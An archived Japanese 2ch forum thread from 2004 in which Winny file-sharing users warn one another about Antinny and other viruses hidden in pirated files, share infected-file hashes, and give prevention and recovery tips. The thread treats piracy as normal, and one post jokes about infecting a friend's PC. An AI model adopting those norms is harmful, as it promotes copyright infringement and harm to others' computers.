5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警報】Winnyを狙ったワーム・ウイルス情報 Part9

1 :ファラフィーレ ◆wtCGnZXpcE :04/02/06 01:35 ID:YSJBvuKA
anntiny、その他winnyで流れてるウイルスの概要、及び対処方etc
http://nyweb.hp.infoseek.co.jp/

関連ページ
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html

過去スレ
winnyのキャッシュフォルダのみを消すウィルス警報
http://tmp.2ch.net/test/read.cgi/download/1060003283/
【警報】Winnyを狙ったワーム・ウイルス情報 Part2
http://tmp.2ch.net/test/read.cgi/download/1060385909/
【警報】Winnyを狙ったワーム・ウイルス情報 Part3
http://tmp.2ch.net/test/read.cgi/download/1060700316/
【警報】Winnyを狙ったワーム・ウイルス情報 Part4
http://tmp.2ch.net/test/read.cgi/download/1061551896/
【警報】Winnyを狙ったワーム・ウイルス情報 Part5
http://tmp.2ch.net/test/read.cgi/download/1063637671/
【警報】Winnyを狙ったワーム・ウイルス情報 Part6
http://tmp2.2ch.net/test/read.cgi/download/1066288327/
【警報】Winnyを狙ったワーム・ウイルス情報 Part7
http://tmp2.2ch.net/test/read.cgi/download/1068654569/
【警報】Winnyを狙ったワーム・ウイルス情報 Part8
http://tmp2.2ch.net/test/read.cgi/download/1072600676/

2 :[名無し]さん(bin+cue).rar:04/02/06 01:35 ID:TB2zVJyu
2

3 :[名無し]さん(bin+cue).rar:04/02/06 01:35 ID:XXle4BrT
3

4 :[名無し]さん(bin+cue).rar:04/02/06 01:37 ID:8/50Gssy
2Ch定番スレです。


5 :[名無し]さん(bin+cue).rar:04/02/06 01:40 ID:RcwwQvf8
2

6 :[名無し]さん(bin+cue).rar:04/02/06 01:45 ID:8/50Gssy
以下前スレからのコピペです 試す方は自己責任で。

[感染しないためにやっておくべきこと]
・ファイルの拡張子は表示させる。開くときは拡張子を確認 [必須]
・シングルクリックをダブルクリックにする
・アンチウイルスソフトのインストール、常駐、定期的に更新 [初心者は常駐必須]
・落としたファイルは必ずウイルススキャン
・exe, *.lzhなどの二重拡張子を無視リストに(ただし、マシンに負荷が掛かる)
・lzh,zip,rarなど圧縮ファイルは解凍後要注意
・exeファイルは完全自己責任
・こまめにバックアップ
・nyをProgramFilesに置かない、CacheとDownフォルダは詳細表示にする
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というダミーファイルを作る
(サイズは0kbでも可)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限
 ただしインストーラで弊害が起こることもある
・CD/DVDの自動実行はオフ。各OSでのやり方は↓ [必須]
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャー]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000の場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
 ◆WinXPの場合
  1.エクスプローラで CD-ROM ドライブを右クリックして [プロパティ] をクリック
  2.[自動再生] タブをクリックし、ドロップダウンリストで「音楽 CD」を選択
  3.「実行する動作を選択」にチェックし、「何もしない」を選択して「OK」をクリック
※DaemonToolの自動起動をオフにしても意味は無い
・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)


7 :[名無し]さん(bin+cue).rar:04/02/06 01:47 ID:8/50Gssy
無視リスト (以下をIgnore.txtにコピペ)

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0

※ただし、追加しすぎるとマシンに負荷が掛かるので注意

8 :[名無し]さん(bin+cue).rar:04/02/06 02:40 ID:DtY1q2uq
>1


ここがナイト、nyできない

9 :[名無し]さん(bin+cue).rar:04/02/06 04:47 ID:XQMA+a/O
↓俺乙

10 :[名無し]さん(bin+cue).rar:04/02/06 07:37 ID:+mvTjRvH
やっべ、前スレの真性がおもしれぇ
腹が痛くなるほどわらっちまった。

11 :[名無し]さん(bin+cue).rar:04/02/06 18:38 ID:7gDG5qwx
おつ

12 :[名無し]さん(bin+cue).rar:04/02/06 18:42 ID:batD0iun
nyをProgramFilesに置かないっていうのはなんで?

13 :キッド ◆KIDDObSbXI :04/02/06 21:09 ID:0uaUPF2H
くぁwせdfrtgyふじこlp

14 :[名無し]さん(bin+cue).rar:04/02/06 21:24 ID:dl25HmTY
早くryやる香具師が居なくなりますように( -人-)

15 :[名無し]さん(bin+cue).rar:04/02/06 21:30 ID:LkDjftjO
wirry

16 :[名無し]さん(bin+cue).rar:04/02/07 13:55 ID:bwsNCMjQ
ウイルスキタ━━━━━━(゚∀゚)━━━━━━ !!!!!
寝ぼけてて.mp3.exe落として起動しちまった。
そしたらなんか次回起動時からデスクトップ表示が出来ないんだが…
「このコンピュータの制限により〜・・・」とか出る。
しかもシステム管理者名が「winnyで違法ファイル集めてます(^^)」に変わってて。
ウイルスバスターとか感知できないのね、困った。
同じ症状の人いない?

17 :[名無し]さん(bin+cue).rar:04/02/07 14:01 ID:Xxevmroz
>>16
新手のウイルスかな?
一応スレをageときます。

18 :[名無し]さん(bin+cue).rar:04/02/07 14:16 ID:bwsNCMjQ
>>17
thx
一応ネットできるからマシなんだけど・・・

19 :[名無し]さん(bin+cue).rar:04/02/07 14:26 ID:Xxevmroz
>>18
うーん、exeは問答無用で無視リストだからなぁ。
詳しい人なら、そのexeファイルを解析できるかもしれないけど、、、

#こういう時ってシステムの復元を使ってよいものかな?

20 :[名無し]さん(bin+cue).rar:04/02/07 14:56 ID:bwsNCMjQ
WCIでダウンリスト形式で複写してみますた
【シングル】[2004.02.04] L'Arc-en-Ciel - READY STEADY GO (CD音源-320k).mp3 .exe,
rVE1UuQdG,0,0,199dab2e1f9f36e7f9315a77e1a952f3,1



21 :[名無し]さん(bin+cue).rar:04/02/07 15:01 ID:iHG4FwFO
今見たらぬるぽって書かれてたんですが、何か被害があるわけでもないのですが、
どうしたらいいですか?

22 :[名無し]さん(bin+cue).rar:04/02/07 15:02 ID:bwsNCMjQ
http://nyweb.hp.infoseek.co.jp/
漏れみたいになってない限りはこれでおkかと

23 :[名無し]さん(bin+cue).rar:04/02/07 15:04 ID:WHomNNIF
ああ、ファイル名が

「********.mp3 .exe」

みたいにスペースが長く入っててわかりにくいやつもあるよね。

24 :[名無し]さん(bin+cue).rar:04/02/07 15:06 ID:WHomNNIF
そっか。多すぎるスペース削除されるのか。
じゃ、かわりに_で。

「********.mp3________________.exe」

こんなかんじ。

25 :[名無し]さん(bin+cue).rar:04/02/07 15:08 ID:BURoAcbX
>>21
どうしたらいいんだろうね。
俺は他人に指示されないと、何も出来ない人だからわかんないや。

26 :[名無し]さん(bin+cue).rar:04/02/07 15:12 ID:bwsNCMjQ
>>24その通りです
スペース長すぎて気づかなかった(´Д⊂

27 :21:04/02/07 15:37 ID:iHG4FwFO
>>22
さっそくやりました。ありがとう。
NY本体をprogramfiles\winny には入れてなかったからUPフォルダは作られてなかった。

28 :[名無し]さん(bin+cue).rar:04/02/07 16:09 ID:WHomNNIF
>>26
新種かな?
symantecとかに通報してみては?

29 :[名無し]さん(bin+cue).rar:04/02/07 16:12 ID:OYtDZlO1
2ch女神ファイルはAntinny入りだらけだな

30 :[名無し]さん(bin+cue).rar:04/02/07 17:19 ID:bwsNCMjQ
ageます
シマンテック通報する前にオンラインスキャンしてみたところ、安全という結果が・・・
やっぱ通報したほうがいいのかな・・・

31 :[名無し]さん(bin+cue).rar:04/02/07 18:24 ID:bwsNCMjQ
この際OS再インストールするしかないかな(´・ω・`)ショボーン

32 :[名無し]さん(bin+cue).rar:04/02/07 20:07 ID:BURoAcbX
>>31
おせっかいかもわからんけど。。。

MBRとかBIOSに感染するタイプもあるので、
OS再インストールが万能とは限りません。
どういう種類のウィルスかがはっきりしない以上、
やはりシマンテックなりトレンドマイクロなりに
報告しておいたほうが良いかと。


33 :[名無し]さん(bin+cue).rar:04/02/07 20:40 ID:qp33odRb
daemonの自動起動切ってなかってウィルスにやられた・・・

[新作 アプリ APP] ATLAS 翻訳スーパーパック V10 disc1+2.rar EHqq2wAhN0 711,229,492 98303cb919ce7dd25edd035e720a1cab
↑これね

レジストリ書き換えられて色々とexeとかdllの実行ファイルが使えなくなってるのは
ftp://ftp.europe.F-Secure.com/anti-virus/tools/s7disinf.reg
のレジストリファイルを使って上書きして、とりあえず復旧できるっぽ。

   ∩___∩
   | ノ      ヽ
  /  ●   ● |   もまいらも気を付けろクマー
  |    ( _●_)  ミ
 彡、   |∪|  、`\
/ __  ヽノ /´>  )
(___)   / (_/
 |       /
 |  /\ \
 | /    )  )
 ∪    (  \
       \_)

34 :[名無し]さん(bin+cue).rar:04/02/07 20:44 ID:qp33odRb
ageてしまった・・・

   ∩___∩
   | ノ      ヽ
  /  ●   ● |   恥ずかしいクマー
  | /// ( _●_)  ミ
 彡、   |∪|  、`\
/ __  ヽノ /´>  )
(___)   / (_/
 |       /
 |  /\ \
 | /    )  )
 ∪    (  \
       \_)

35 :[名無し]さん(bin+cue).rar:04/02/07 20:51 ID:JJYMrOb4
ファイル交換ソフト「Kazaa」の開発元であるオーストラリアのSharman Networksは6日
、オーストラリア連邦裁判所の命令により家宅捜索を受けたと発表した。

 家宅捜索命令は、オーストラリアの主要なレコード会社に代わって執行されたもので
、シドニーにある同社オフィスのほかに幹部2人の自宅も対象となった。Sharmanによれば、
今回の家宅捜索はオーストラリアで進行中の裁判に関連したもので、
米国で進行中の訴訟とのつながりはないという。

36 :16-31:04/02/07 21:16 ID:e2MJXzoH
再セットアップ完了。世話かけました。
報告しようと思って感染元ファイル探してみたけどウイルスの手により削除済み・・・

37 :[名無し]さん(bin+cue).rar:04/02/08 00:04 ID:ylsBv2wZ
ファイル KOF2003+NeoRAGEX Hack.rar
中のexeファイルを起動・・・
血の垂れるスクリーンセーバー起動
キターーーーー!!
やった人いる?

38 :[名無し]さん(bin+cue).rar:04/02/08 00:38 ID:azYNnxwL
>>16さんのウィルスとたぶん同種のものを報告したいんですが、
やり方がわからないので、うpするのでだれか報告してくれませんか?

39 :[名無し]さん(bin+cue).rar:04/02/08 02:21 ID:cZBM/B4D
>>38
http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
ここでサンプルで提出するのでは?

俺の場合はサンプル提出しようとしたけど感染ファイルがキャッシュごと消えてたて不可だった(;´∀`)

迷惑だけど自業自得と言われればそれまでだ罠

40 :[名無し]さん(bin+cue).rar:04/02/08 06:42 ID:8vMjPSEa
わ〜ぃ ヴァカ共もっと感染しれ〜 もまえら通報する所間違えるだろ? まずk察に通報だヽ(´▽`)ノ

41 :[名無し]さん(bin+cue).rar:04/02/08 07:09 ID:jsZtrO6G
     _,.、,.、,.、_
   ,;:'゙ : " . ; ゙ ";,.      __________
  ,:'. ; . ゙∧ ∧ ; .';,.   /
  .;: ゙ . ; ": ・ ・ . : '.:; < ageろおめーら
  .;: " . : ゙. )●( . ":;   \__________
  ':;, ゙ ; . " ー . ゙ . :;
   ゙ : 、,._, ._, ._., : "

42 :[名無し]さん(bin+cue).rar:04/02/08 11:08 ID:8W779Ksv
マイドキュメントフォルダの内容が全部消えてしまった・・
(アプリ)Aplix WinCDR 8.0 Premium(ccd)+シリアルを解凍
してDAEMONでSETUPしとうとしたらこんな羽目に・・
なんか良い修復方法はないですか?

43 :[名無し]さん(bin+cue).rar:04/02/08 11:56 ID:IkSL8tdh
フリーソフトなら「復元」
市販なら「FinalData」
他にもあると思うが、あとは自分で調べれ。

44 :[名無し]さん(bin+cue).rar:04/02/08 12:09 ID:lELVFq/c
マイドキュメントには大事なファイル置かないほうがいいよ。
狙われやすいからね。
普通の人間なら構わないが、ここらへんにいる人間はこれ以外にもいろんな面において
デフォルトは危険ということを認識したほうがいい。

45 :[名無し]さん(bin+cue).rar:04/02/08 12:36 ID:Oznj7EDf
GBAロムの詰め合わせを大量に落として、ウイルスを駆逐したいのですが
アンチウイルスソフトはAVGを入れていて、発見の報告だけで駆逐できないので
落としたzipをフォルダにまとめて*.exeをWinの検索で探して
見つかったら削除という方法で対処しようかと思っていますがいかがなものでしょうか?
片手落ちですか?


46 :[名無し]さん(bin+cue).rar:04/02/08 12:58 ID:wd348qby
最近はGBAの逆転裁判装ったウイルス多すぎ

47 :[名無し]さん(bin+cue).rar:04/02/08 13:07 ID:J6LuMh8Q
HDDが全消去されたらどうするんでつか?


48 :[名無し]さん(bin+cue).rar:04/02/08 13:49 ID:/ltgBLuI
>>47
あきらめろ。どんなに強力な復元ツールをつかっても無駄だった_| ̄|○

49 :[名無し]さん(bin+cue).rar:04/02/08 14:56 ID:3nhhlef+
>44
Σ(゚д゚)そうなの?
狙われてるのか…もしかして中身落とされてたりする?

50 :[名無し]さん(bin+cue).rar:04/02/08 19:55 ID:o/8qhoqI
該当ファイルのハッシュを貼れと

51 :[名無し]さん(bin+cue).rar:04/02/08 21:16 ID:5yd8lUaa
[シングル][2004.02.04] 上戸彩 - 愛のために。.mp3________ .exe 10,819,492 19a1ed2a2e511191bd4f4db0a281c398
このファイルです。

52 :[名無し]さん(bin+cue).rar:04/02/08 21:41 ID:dH7+owBg
exeは無視リストに入れとけと何度語られたことやら…

53 :[名無し]さん(bin+cue).rar:04/02/08 21:48 ID:o/8qhoqI
ウィルスが同梱されてるとかのみ晒そう。
exeはみんな無視入れてるだろうから。

54 :[名無し]さん(bin+cue).rar:04/02/08 21:51 ID:kevIooXD
でも実際コーデックなんかはexeファイルが多いい訳で

55 :[名無し]さん(bin+cue).rar:04/02/08 21:55 ID:dH7+owBg
コーデックなんてnyで落とすバカいんのか

56 :[名無し]さん(bin+cue).rar:04/02/08 22:20 ID:kevIooXD
インストーラの呼び出し先にexeあったら防ぎ様無いよ

57 :[名無し]さん(bin+cue).rar:04/02/08 22:24 ID:dH7+owBg
お前は救い様の無いバカだな

58 :[名無し]さん(bin+cue).rar:04/02/08 22:29 ID:kevIooXD
バカって言われても解凍中に実行されても防げるなら方法おしえてよ
じゃなきゃ救いようってヤシ教えれ

59 :[名無し]さん(bin+cue).rar:04/02/08 22:30 ID:kevIooXD
じゃ無きゃ黙って国産ウイルスつくってみ

60 :[名無し]さん(bin+cue).rar:04/02/08 22:30 ID:kevIooXD
終了

61 :本物のバカ発見:04/02/08 22:32 ID:dH7+owBg
解凍中に実行されても
解凍中に実行されても
解凍中に実行されても
解凍中に実行されても
解凍中に実行されても

62 :[名無し]さん(bin+cue).rar:04/02/08 22:33 ID:kevIooXD
もういいです改厨は

63 :[名無し]さん(bin+cue).rar:04/02/08 22:45 ID:zQcZg2M9
norton つっこめ(゚Д゚#)ゴルァ!!

64 :[名無し]さん(bin+cue).rar:04/02/08 22:47 ID:kevIooXD
再開


65 :[名無し]さん(bin+cue).rar:04/02/08 22:56 ID:zQcZg2M9
(´Д`;)<>>64!!もういい、お前は頑張った!

66 :[名無し]さん(bin+cue).rar:04/02/08 23:00 ID:kevIooXD
まりがとー

67 :[名無し]さん(bin+cue).rar:04/02/08 23:18 ID:z+5hQN9W
>>16
漏れその症状だった。
OS再インストした方がいいよ。
漏れもOS再インストでシステム使用者名のところ直った。
mp3でもウィルス入ってる場合あるからね。
exeじゃなくて

68 :[名無し]さん(bin+cue).rar:04/02/08 23:21 ID:kevIooXD
&日付が変わる前にこれだけは言わせて
その勢いでコード打てれば大したもんだけど罵声の羅列じゃ何も動かんだろ
と。

69 :[名無し]さん(bin+cue).rar:04/02/08 23:22 ID:kevIooXD
ありゃ?

70 :[名無し]さん(bin+cue).rar:04/02/08 23:30 ID:4/OZ5rBx
(  Д )゚ ゚

71 :[名無し]さん(bin+cue).rar:04/02/09 00:11 ID:YxcD/fdf
ワレやってんだからウイルスの一つや二つくらいリスクを負うもんじゃないかなぁと言ってみるテスツ
虎穴に入らずんばってヤシでつよ(´ー`)y-┛~~

72 :[名無し]さん(bin+cue).rar:04/02/09 00:15 ID:DDfLPaSk
>>71
それをメインPCでやる香具師はバカ
検証環境くらい用意しておけ
中古のノートPCくらい5万でお釣り来るだろ

73 :[名無し]さん(bin+cue).rar:04/02/09 00:36 ID:NgDzS0nH
仮想PC上でしたら?タダだし

74 :[名無し]さん(bin+cue).rar:04/02/09 00:45 ID:nL/SVAZd
どっちにしろ、通報しる!

75 :[名無し]さん(bin+cue).rar:04/02/09 01:08 ID:19HJs+93
【シングル】[2004.02.04] L'Arc-en-Ciel - READY STEADY GO (CD音源-320k).mp3.exe
←踏んだ。システムの復元もできないようになる訳ね、ノートン先生も知らなかった。逝ってきます。

76 :[名無し]さん(bin+cue).rar:04/02/09 01:53 ID:rhM2S+X0
こんな時間ですがちょっとお邪魔します。
HTML.SUAR.AとPE_Mtx.Aってのに引っかかったみたいなんですが、
これって一体どんな影響あるんですかね?
HTML.SUAR.Aってのは最初気づかなかったんで起動してしまったんですけど
そのときPCが変な音したんですぐ電源落としました。
もしかして何か消えてたりするんですかね?

77 :[名無し]さん(bin+cue).rar:04/02/09 02:13 ID:Jp1asUfC
>>76
HTML_SUAR.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_SUAR.A
PE_MTX.A
http://www.trendmicro.co.jp/mtx/

78 :[名無し]さん(bin+cue).rar:04/02/09 02:36 ID:rhM2S+X0
>>77
わざわざありがとうございます。
両方そんなに害はないみたいですね。
感染してたファイル全部消したら
スキャンしてもウィルスにかかってないって出るんで
もう大丈夫なのかな?
お世話になりますたー。

79 :[名無し]さん(bin+cue).rar:04/02/09 02:38 ID:EVTllu0o
【Single】 2004.02.04 ZONE - 卒業 (192k)mp3.zip
24,670,997 2487724f7caa543180829cd8c16173b7
←この中にあるmp3を開いてしまった。
システムの復元ができなくなってしまう。
特権命令違反と、システム管理者が「Winnyで違法ファイルを集めています(^^)」が
表示されます。>>75 と同じ新種ウィルスかな?
OS再インストしたので、解決はしたんだけど。
何のウィルスなんでしょうか。

80 :[名無し]さん(bin+cue).rar:04/02/09 02:57 ID:7X6WyH5Y
トレンドとシマンテックには誰か報告した?

81 :16:04/02/09 03:07 ID:9/3I8tcr
>>79
感染元のファイル残ってたらトレンドとシマンテックに報告して、後世のために

82 :[名無し]さん(bin+cue).rar:04/02/09 03:13 ID:eI51VZkd
(アプリ)ATOK17(ccd+rr3%)シリアル付.rar 53,080,912 333701088078b262a6e35d82082feb91
これを踏んでしまってHDからファイルが消えてしまったのですが、これって物理フォーマットされてるんでしょうか?
ファイナルデータで復旧可能でしょうか?


83 :[名無し]さん(bin+cue).rar:04/02/09 03:25 ID:DDfLPaSk
>>79
これ今確認したけど異常なし。捏造には違いないけど無害

84 :[名無し]さん(bin+cue).rar:04/02/09 04:05 ID:1pBAerEh
>>83
君が犯人。間違いない

85 :[名無し]さん(bin+cue).rar:04/02/09 04:09 ID:DDfLPaSk
こらこら、犯人にするなw

他の落としてみたけど、
(シングル)(2004.02.04) ZONE - 卒業 c/w backing track.zip 31,581,089 9f63914b79e3a0ecda7ce8a463a481ad
これは、バックドアが仕込まれてた

まぁ人気アーティストの新譜には気をつけませう

86 :[名無し]さん(bin+cue).rar:04/02/09 04:59 ID:Ytlu/LSE
ウイルスに感染している疑いのあるファイルを Symantec Security Response に提出する方法
ttp://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

87 :[名無し]さん(bin+cue).rar:04/02/09 06:05 ID:nL/SVAZd
まだ、だれもSymantecとかに提出してないんだ。

これ新種だろ?

88 :[名無し]さん(bin+cue).rar:04/02/09 08:23 ID:bp4WV1z3
新種のウイルスはこうやって広まるんですね
勉強になります・・・

89 :[名無し]さん(bin+cue).rar:04/02/09 08:36 ID:8zB/Ui1T
「スキーで骨折したので休みます。」とは言えても、
「ソープ行って淋病になったので休みます。」とはなかなか言えないよな。


90 :[名無し]さん(bin+cue).rar:04/02/09 08:51 ID:Ewp/nczV
>>22
たすかりますた。ありがd

91 :[名無し]さん(bin+cue).rar:04/02/09 10:32 ID:igp3hjGA
ほほ。今人気のウイルスダウンしますた。
友達のPCにかましてみよっとww


92 :[名無し]さん(bin+cue).rar:04/02/09 10:42 ID:7lNj6bpU
>20
漏れも危うく実行するとこだったが、ぎりぎりで報告読んだので助かりました。
dクス。

本当にウイルスチェックに引っかからなかったのでビックリ。

93 :[名無し]さん(bin+cue).rar:04/02/09 11:38 ID:f9XVo+9l
>>79
eTrustで反応した気がする。
MTX.Attachment.Worm
間違ってたらスマソ

94 :[名無し]さん(bin+cue).rar:04/02/09 14:44 ID:wuod16Nv
>>82
           _,.yトーゞrッヽv,、_,.
         ,rk´ミ、''ナ;;爻'、ー;;〃彡;,.
        vf戈ハトシ〈'"リ゙、ヾ、;;jリ、〃、    
       Yメ从k;;、;;ij;;;ii;ヾ;ッ;仆、ヾくソ   
       }ソリ"i!;;;;;l;;i;;、;;:;:;;:;';;;};;iリドシゞ,   
       ツ;;;;;;;;;;ト、;;_リ;;;i!;;ト;=;、t;;;l;;ヒ'   
       ヲ;i!、:::r',;、=;'、;"リ,、=;''"リ;ij´     
        };lヾ;;j  ̄´.〃l゙ ̄´ ,';
 r‐、       7;;;;|',    =、j,.   /仆、
 } ,! _      ゞ;|:ヽ   ,:ニ> /:: レ ソ\,.、- ' "´;; ̄::
 j _,!ノ )" ̄>.ニト、:\` "'' ///,r/:::::::_,..、''' ..,,
フ ,、'-‐'l" ̄リ;/::;;/::} `:::`:ー'/'∠;:/`゙ヽ・.‐´
‐' 冫‐i '"フ:;/::;;;{! `r‐'"フ´〃シ:;;/ " ヽ、. リ'"  ,、_,
. '",.ィ/ ̄_:;/::;;イ `'ー ''/ヲリ/;/r'/,r─‐-、 (∴,、-''"
  '二⊃ヾ/.:;;/ `ー-‐/Ξ/ッ/rレヘ{ | ̄|  `''"

 その必要はない。お前のHDDはすでに死んでいる


95 ::[名無し]さん(bin+cue).rar :04/02/09 14:54 ID:X/ei/bdA
話題のmp3実行してしまいました でもなんかエラーが表示されただけで
PC再起動しても>>79のような症状がまったく出なかったよ、こういう人いる?
逆に気持ち悪いんだが・・・

96 :[名無し]さん(bin+cue).rar:04/02/09 16:00 ID:8bWZL/su
「○○さんの家へ空き巣に入ろうとしたら、犬に噛まれました。
 ボクの持ってる餌では釣れませんでした。助けて下さい。」

「そりゃ大変だ。早く保健所に連絡して、そんな犬は駆除してもらおう。
俺たち泥棒が安心して仕事できるようにな。」


なにが「後世のため」だよ。アホか。

97 :[名無し]さん(bin+cue).rar:04/02/09 16:17 ID:eEGEKZYr
>>91
もしやったら報告キボンヌヽ(´ー`)ノ

98 :[名無し]さん(bin+cue).rar:04/02/09 16:42 ID:kUm/ZxgH
拡張子は本当にmp3なのか?

99 :[名無し]さん(bin+cue).rar:04/02/09 16:58 ID:E034QEI+
(アプリ)Aplix WinCDR 8.0 Premium(ccd)+シリアルを解凍


おれもこれ食らいました

100 :[名無し]さん(bin+cue).rar:04/02/09 18:57 ID:4GXMeqJN
100エトー
ZONEの新曲ウィルスだらけだけど、大丈夫かなぁ?

101 :[名無し]さん(bin+cue).rar:04/02/09 19:37 ID:eX6qzeAd
75だけど、>>79と同じ症状
OSは問題無く入ったってとこが違う
ブートセクタ感染型ウイルスでは無いのかな?

102 :[名無し]さん(bin+cue).rar:04/02/09 19:41 ID:HM3Yjr3U
>>37
スクリーンセイバー起動したあと、なにかファイルが壊れるとか実害はありました?

>>95
ハッシュを。

>>98
本当はexe。mp3とexeの間にたくさんのスペースがあるから、パッと見ただけでは気づかない。アイコンもWMPのものだった。
Mydoomも使ってる手口です。

103 :[名無し]さん(bin+cue).rar :04/02/09 20:50 ID:X/ei/bdA
[シングル](2004.02.11) ソニン - ほんとはね。.mp3 .exe
a44c591bff37a6703f73b132e85d5bc6

これですが、どうなんでしょう?

104 :[名無し]さん(bin+cue).rar:04/02/09 20:53 ID:DDfLPaSk
>>103
どうも、こうも、exeって書いてあるじゃん

105 :[名無し]さん(bin+cue).rar:04/02/09 20:55 ID:3I4OxOUD
ワロタ
こんなド素人、本当にいるんだな
それとも釣りか?

106 ::[名無し]さん(bin+cue).rar :04/02/09 20:56 ID:X/ei/bdA
実行するとどうなるのか>>102に聞いてんだよ

107 :[名無し]さん(bin+cue).rar:04/02/09 21:10 ID:g0jfv9Sh
自分で実行してみりゃいいじゃんw

108 :[名無し]さん(bin+cue).rar:04/02/09 21:13 ID:DDfLPaSk
>>106
君にこの言葉を贈ろう


「新参者は半年ROMっとけ!」

109 :[名無し]さん(bin+cue).rar:04/02/09 21:43 ID:8zB/Ui1T
>>106
残った家族の面倒は見てやるから、安心して実行しろ。

110 :[名無し]さん(bin+cue).rar:04/02/09 21:57 ID:ZPw0zyaA
>>106
再起動するとわかる訳

111 :アホばっか:04/02/09 21:58 ID:6520g/YW
無視リスト (以下をIgnore.txtにコピペ)

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0

112 ::[名無し]さん(bin+cue).rar :04/02/09 22:12 ID:X/ei/bdA
>>108
95だけどさ、読んだ?実行したけど症状が出なかった
だから気持ち悪いって言ってんのよ、他の人はどうかなって
聞いてんの?理解できた?

113 :[名無し]さん(bin+cue).rar:04/02/09 22:16 ID:CRnVlilI
キャッシュがNightfallって認識された・・・。
誤認識?

114 :[名無し]さん(bin+cue).rar:04/02/09 22:25 ID:ZPw0zyaA
>>112
パソコン再起動後も変化なし?

115 :[名無し]さん(bin+cue).rar:04/02/09 22:27 ID:3yGDXBAR
>>112
わたしも、ファイル名はちがうけど
mp3で再生できなかったので
極窓でみたら、exeでした。
今のところ具体的な症状はでてません。

116 :[名無し]さん(bin+cue).rar:04/02/09 22:31 ID:ZPw0zyaA
>>112 >>115
OSは?ちなみに感染したオレ75はXP


117 :[名無し]さん(bin+cue).rar:04/02/09 22:36 ID:DDfLPaSk
>>112
exeを落とし、おまけに実行までしてしまうとは…
お前がバカだという事は理解できた(⌒▽⌒)アハハ!

118 :[名無し]さん(bin+cue).rar:04/02/09 22:36 ID:3yGDXBAR
>>116
XPです

119 ::[名無し]さん(bin+cue).rar :04/02/09 22:41 ID:X/ei/bdA
>>117
人間だからね、ミスもあるさ
君みたいに完璧な人間ばかりじゃないよ、笑えよもっと

120 :[名無し]さん(bin+cue).rar:04/02/09 22:44 ID:ZPw0zyaA
>>118
オレのはハードディスクまで逝っちまったぽ

121 :[名無し]さん(bin+cue).rar:04/02/09 22:57 ID:3yGDXBAR
>>120
再起動したけど、今のところは
実害はないです。
ちなみにキャッシュは
7bc48024f9ad6353f9663c37992bdf10
どなたか鑑定してくれる、勇者はいませんか。

122 :[名無し]さん(bin+cue).rar:04/02/09 23:59 ID:k9X80507
>>1にannityの削除方法が書いてありますが、ノートン系を利用しても、これもしないとやヴぁいですか?

123 :[名無し]さん(bin+cue).rar:04/02/10 00:14 ID:nBJ8LpMz
>アイコンもWMPのものだった。

いいカモだなぁw
ダウソ住人でWMP使ってるやついないだろ

124 :[名無し]さん(bin+cue).rar:04/02/10 00:19 ID:M8I3BoDK
普通にWMP使ってますが

125 :[名無し]さん(bin+cue).rar:04/02/10 00:26 ID:HB2B6CQi
>>123
詳しそうなので
鑑定よろ!

126 :[名無し]さん(bin+cue).rar:04/02/10 00:43 ID:nBJ8LpMz
>>125
んが?
鑑定って何すればいいの?

127 :[名無し]さん(bin+cue).rar:04/02/10 00:56 ID:HB2B6CQi
nBJ8LpMzさん
>>115
>>121

128 :[名無し]さん(bin+cue).rar:04/02/10 01:28 ID:nBJ8LpMz
>>121のハッシュ、ウィンナで検索したら
【シングル】(2004.02.18) 浜崎あゆみ - Graduation [CD音源][192kbps].mp3
が一個かかった。

拡張子を.exeに変えて実行してないなら問題ないんじゃない?
いや、知らんけどさ

129 :[名無し]さん(bin+cue).rar:04/02/10 02:45 ID:U3ljYuD3
>>121
捨て環境で実行してみたところ、DLL open error メッセージが表示されて
一見、起動できなかったように見える。

1、タスクマネージャで確認したところ、その時点では新しいタスクは動いていなかった。
2、レジストリ、スタートアップフォルダ、Win.ini、Autoexec.bat
と、思いつく限りの自動実行項目をチェックしたところ、新規に設定されたものはなかった。
3、レジストリの他の項目も変化なし。
3、メールが送られた形跡もなし。
5、Winnyの設定も変化なし。

以上のことから、マジでDLLが無くて起動できなかった模様。
(俺の力量の範囲内での判断だから、わかんないけどね。。)
もしそうだとしたら、えらいお間抜けなヤツが作ったヘッポコウィルスだと思われる。


130 :[名無し]さん(bin+cue).rar:04/02/10 02:50 ID:c3knSBbz
そんなのヘッポコに大打撃受けた俺ら

吊ってくる・・・

131 :[名無し]さん(bin+cue).rar:04/02/10 03:06 ID:LoNyM3HP
こういう>129氏みたいな人がこのスレに居るのに歓心と
驚き。

これからもここは要チェックと、こんな時間に思った。

スキル無いからここに張り付きます。

132 :[名無し]さん(bin+cue).rar:04/02/10 12:19 ID:8HIfgc/U
